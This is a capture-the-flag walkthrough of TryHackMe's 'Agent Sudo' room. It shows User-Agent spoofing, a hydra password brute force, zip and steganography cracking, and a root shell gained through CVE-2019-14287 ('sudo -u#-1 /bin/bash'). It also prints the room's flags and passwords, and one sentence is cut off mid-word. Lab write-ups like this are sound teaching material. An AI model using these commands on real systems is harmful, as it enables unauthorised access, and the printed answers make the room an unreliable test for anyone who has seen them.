Challenges: Agent Sudo (TryHackMe)

Jebitok

Welcome to my walkthrough of the Agent Sudo room on TryHackMe — a CTF that tests your ability to pivot through enumeration, hash cracking, steganography, and privilege escalation. This challenge blends web recon, curiosity-driven digging, and a touch of real-world OSINT. Throughout this write-up, I’ll walk through the steps I took to discover hidden agents, crack credentials, uncover secrets buried in images, and finally gain root access by exploiting a known vulnerability.

Let’s jump in and dissect the mystery one flag at a time. 👇

Author note

Welcome to another THM exclusive CTF room. Your task is simple, capture the flags just like the other CTF room. Have Fun!

If you are stuck inside the black hole, post on the forum or ask in the TryHackMe discord.

Enumerate

Enumerate the machine and get all the important information

Answer the questions below

  1. How many open ports? 3

    nmap -sV <IP_Address>

    The version scan reports three services, and they are the three the rest of the room works against: FTP, SSH and HTTP. Adding -p- confirms nothing else is listening on a higher port.

  2. How do you redirect yourself to a secret page? user-agent

    One thing about cybersecurity is that you have to be curious and willing to explore every possibility of where the flag, the expected answer or the vulnerability might be. In this case gobuster doesn't reveal the page, but opening http://<IP_Address> in the browser shows the hint: the secret page is reached by changing your User-Agent header.

    gobuster dir -u http://<IP_Address> -w /usr/share/wordlists/dirb/common.txt

  3. What is the agent name? chris

    I tried navigating around but couldn't find the name. With some research, I learned that Burp Suite would be an option, but it didn't work for my case.

    Eventually, this revealed the name: curl -A "C" -L http://<ip_address>

Details about the parts of curl -A "C" -L http://<ip_address>

| Part | What it does |
| --- | --- |
| curl | The command-line tool used to make HTTP requests. |
| -A "C" | Sets the User-Agent header to "C", the codename the challenge expects. The server keys its response on this header, so the request looks like it comes from agent "C". |
| -L | Follow redirects. If the server responds with a 301 or 302 (redirect), curl follows the redirect automatically. |
| <ip_address> | The target web server (e.g., http://10.10.150.81). |

🧠 Why -L was Needed

When you visit http://<ip> with the right User-Agent, the server answers with a redirect to another page (a hypothetical /secret or /agent/landing; the real destination is whatever the Location header says). Without -L, curl prints only the body of that redirect response, which is usually empty, and stops. With -L, curl follows the redirection and retrieves the final page.

You can test it yourself by omitting -L and adding -i so the response headers are printed:

    curl -i -A "C" http://<ip_address>

You'll see something like:

    HTTP/1.1 302 Found
    Location: /agent-page

But with -L, curl follows it and shows you the actual page contents.


✅ Summary on curl -A "C" -L

👉 Sets the user-agent to "C" (to satisfy the challenge requirement)
👉 Follows redirects to reach the actual content
👉 ✅ Satisfies the server's User-Agent check and gives you the page meant for agent "C"
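To make the redirect behaviour concrete, here is an added example (not code from the room or from this write-up) that stands up a small User-Agent-gated page in Python and fetches it both without and with following the redirect, the way curl behaves without and with -L. The handler, the /agent_page path and the page texts are constructed for the example and only imitate the pattern; the room's real server is not reproduced.

```python
"""User-Agent-gated page plus a client that mimics curl -A with and without -L.
Added example; the handler is a hypothetical stand-in for the room's server."""
import threading
from http.client import HTTPConnection
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit

AGENT_PAGE = "/agent_page"  # hypothetical path chosen for this example
CODENAME = "C"


class AgentHandler(BaseHTTPRequestHandler):
    """Serve a hint page by default; redirect to the agent page only when the
    User-Agent header is exactly the codename, and refuse the page otherwise."""

    def do_GET(self):
        ua = self.headers.get("User-Agent", "")
        if self.path == "/" and ua == CODENAME:
            # This is the response curl shows (an empty body) without -L.
            self.send_response(302)
            self.send_header("Location", AGENT_PAGE)
            self.send_header("Content-Length", "0")
            self.end_headers()
        elif self.path == AGENT_PAGE and ua == CODENAME:
            self._body(200, b"Attention agent C: your page\n")
        elif self.path == AGENT_PAGE:
            self._body(403, b"Wrong agent\n")
        else:
            self._body(200, b"Use your codename as User-Agent to access the site\n")

    def _body(self, code, data):
        self.send_response(code)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):  # keep the example quiet
        pass


def start_server():
    """Bind to a free loopback port and serve in a background thread."""
    srv = HTTPServer(("127.0.0.1", 0), AgentHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def fetch(host, port, path, user_agent, follow=False, max_hops=5):
    """Equivalent of `curl -A user_agent [-L] http://host:port/path`.
    Returns (status, location, body). Without follow, a redirect is returned
    as-is, which is what curl gives you without -L."""
    for _ in range(max_hops):
        conn = HTTPConnection(host, port, timeout=5)
        conn.request("GET", path, headers={"User-Agent": user_agent})
        resp = conn.getresponse()
        body = resp.read().decode()
        location = resp.getheader("Location")
        conn.close()
        if follow and location and resp.status in (301, 302, 303, 307, 308):
            path = urlsplit(location).path or "/"  # same host in this example
            continue
        return resp.status, location, body
    raise RuntimeError("too many redirects")


if __name__ == "__main__":
    srv = start_server()
    host, port = srv.server_address
    print("browser UA, no -L :", fetch(host, port, "/", "Mozilla/5.0"))
    print("agent UA, no -L   :", fetch(host, port, "/", CODENAME))
    print("agent UA, with -L :", fetch(host, port, "/", CODENAME, follow=True))
    srv.shutdown()
```

The second call returns the 302 and its Location header with an empty body, which is exactly why the page looked empty before -L was added; the third follows it and returns the agent page.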

Hash cracking and brute-force

Done enumerate the machine? Time to brute your way out.

Answer the questions below

  1. FTP password crystal

    hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://<IP_Address>

  2. Zip file password alien

    $ ftp <IP_ADDRESS>

    Enter the username (chris) and the FTP password (crystal).

    ftp> mget *

    The files are now in the directory ftp was run from on the attacking machine. Steghide and other tools were not helpful on cutie.png, but binwalk was; if binwalk -e fails with a Capstone error as it did for us, reinstall the pinned version first:

    sudo pip3 uninstall capstone

    sudo pip3 install capstone==4.0.2

    binwalk -e cutie.png

    Now we have the _cutie.png.extracted directory, which contains the zip file we're looking for. Here are the next steps:

    ls _cutie.png.extracted

    cd _cutie.png.extracted

    zip2john 8702.zip > zip_hash.txt

    ls

    cat zip_hash.txt

    john zip_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

  3. steg password Area51

    I tried different tools; 7-Zip worked eventually, and I was able to view the txt file. It revealed a hash, and I used CyberChef to convert from base64.

    sudo apt install p7zip-full

    7z x -palien 8702.zip

    (-palien is -p followed directly by the password, alien, with no space)

    cat To_agentR.txt

  4. Who is the other agent (in full name)? james

    steghide extract -sf cute-alien.jpg -p Area51

    cat message.txt

  5. SSH password hackerrules!

    The password is in the same message.txt extracted from cute-alien.jpg.

Capture the user flag

You know the drill.

Answer the questions below

  1. What is the user flag? b03d975e8c92a7c04146cfa7a5a313c7

    Since we got the SSH password in the previous task and know the user's name (james), we log in over SSH as james, read the user flag from his home directory, and escalate privileges in the next steps.

  2. What is the incident of the photo called? Roswell alien autopsy

    We had to copy the image found in james's home directory back to our own machine in order to reverse-search it with Google; with some OSINT searching we found the incident as reported by Fox News.

    After uploading the image to Google reverse image search, these were the exact matches that came up, and reading through most of the article we see hints of alien, Area 51 and Roswell. The next step is to Google a combination of 'area 51 + alien + roswell + foxnews', in whatever format you prefer. A couple of Fox News articles come up, but the one that stood out is this one.

Privilege escalation

Enough with the extraordinary stuff? Time to get real.

Answer the questions below

  1. CVE number for the escalation

    (Format: CVE-xxxx-xxxx) CVE-2019-14287

    I tried hostnamectl among other options to find a clue to the CVE. Eventually I came across sudo -l. Using its output, especially the command hint at the bottom, a web search turns up CVE-2019-14287.

    Checking the exploit, you'll see it matches both what sudo -l shows for james and the root result it produces. The bug (fixed in sudo 1.8.28) is that a sudoers entry allowing a command as any user except root, written (ALL, !root), can be bypassed by asking for user id -1 (or its unsigned form 4294967295): sudo does not treat that id as root, but the kernel treats -1 as "leave the uid unchanged", and since sudo is already running as root the command runs as root.

    When you find the CVE yo

    To escalate privileges with the help of the CVE and what we have, we use:

    sudo -u#-1 /bin/bash

    Privileges are escalated to root, and we can now find the file that has the root flag.
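The mechanism behind CVE-2019-14287, as an added example rather than the room's exploit: a simplified Python model of sudo's Runas check (not sudo's source code), with a constructed two-user passwd table. It shows why "#-1" passes a "(ALL, !root)" rule in the vulnerable logic yet still ends up as uid 0, and why the 1.8.28 fix rejects that id outright. The last function checks the kernel side for real: setresuid(-1, -1, -1) succeeds for any user and changes nothing, which is the sentinel the bug relies on.

```python
"""Model of the sudo Runas check bypassed by CVE-2019-14287.
Added example: a simplified re-implementation of the logic described in the
advisory, not sudo's code. Sample passwd table is constructed for the demo."""
import os

UID_MAX = 2**32 - 1  # (uid_t)-1 as an unsigned 32-bit value, i.e. 4294967295


def parse_runas_user(spec, passwd):
    """Turn the argument of `sudo -u` into (name, uid).
    A leading '#' means a numeric uid; '#-1' and '#4294967295' both denote
    the id that sudo handed to setresuid() without looking up an account."""
    if spec.startswith("#"):
        uid = int(spec[1:])
        if uid < 0:
            uid += 2**32  # -1 wraps to UID_MAX when stored in an unsigned uid_t
        name = next((n for n, u in passwd.items() if u == uid), None)
        return name, uid
    return spec, passwd[spec]


def runas_allowed(rule_users, rule_denied, name, uid, passwd, fixed):
    """Does a Runas spec such as (ALL, !root) permit this target user?
    Vulnerable logic: the '!root' denial only matches a real account's name
    or uid, so uid -1 (no account, not uid 0) slips through.
    Fixed logic (sudo 1.8.28): uid -1 / UID_MAX is rejected before matching."""
    if fixed and uid in (UID_MAX, -1):
        return False
    if "ALL" not in rule_users and name not in rule_users:
        return False
    for denied in rule_denied:
        if name == denied or uid == passwd.get(denied):
            return False
    return True


def effective_uid_after_switch(current_euid, target_uid):
    """What setresuid(target) leaves behind: -1 is the kernel's 'do not change'
    sentinel, so a sudo process that is already root stays root."""
    return current_euid if target_uid in (UID_MAX, -1) else target_uid


def simulate(sudo_arg, fixed):
    """Outcome of `sudo -u<sudo_arg> /bin/bash` under a (ALL, !root) rule."""
    passwd = {"root": 0, "james": 1000}  # constructed sample /etc/passwd
    name, uid = parse_runas_user(sudo_arg, passwd)
    if not runas_allowed(["ALL"], ["root"], name, uid, passwd, fixed):
        return "denied"
    euid = effective_uid_after_switch(0, uid)  # sudo itself runs as root
    return "root shell" if euid == 0 else f"shell as uid {euid}"


def kernel_ignores_minus_one():
    """Real check of the kernel sentinel: setresuid(-1, -1, -1) succeeds for
    any user and changes no id. Returns True when the ids are unchanged,
    None where the call is unavailable on this platform."""
    if not hasattr(os, "setresuid") or not hasattr(os, "getresuid"):
        return None
    before = os.getresuid()
    os.setresuid(-1, -1, -1)
    return os.getresuid() == before


if __name__ == "__main__":
    for arg in ("root", "james", "#-1", "#4294967295"):
        print(f"sudo -u{arg} /bin/bash -> vulnerable: {simulate(arg, fixed=False)},"
              f" fixed: {simulate(arg, fixed=True)}")
    print("kernel treats uid -1 as 'no change':", kernel_ignores_minus_one())
```

Running it shows "denied" for root and a uid 1000 shell for james under both versions, while "#-1" and "#4294967295" yield a root shell only in the vulnerable model; the detection angle is the same: a Runas target of -1 or 4294967295 in sudo logs should never look legitimate.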

  2. What is the root flag? b53a02f55b57d4439e3341834d70c062

  3. (Bonus) Who is Agent R? DesKel

This room was a solid reminder that good enumeration and a questioning mindset are key in CTFs. From manipulating User-Agents and extracting files from images, to tracking agents through OSINT and exploiting CVE-2019-14287 for privilege escalation, Agent Sudo proved that creativity matters just as much as technical skill.

Thanks for checking out my write-up — and as always, stay curious, keep learning, and happy hacking! Until next time. 🚀
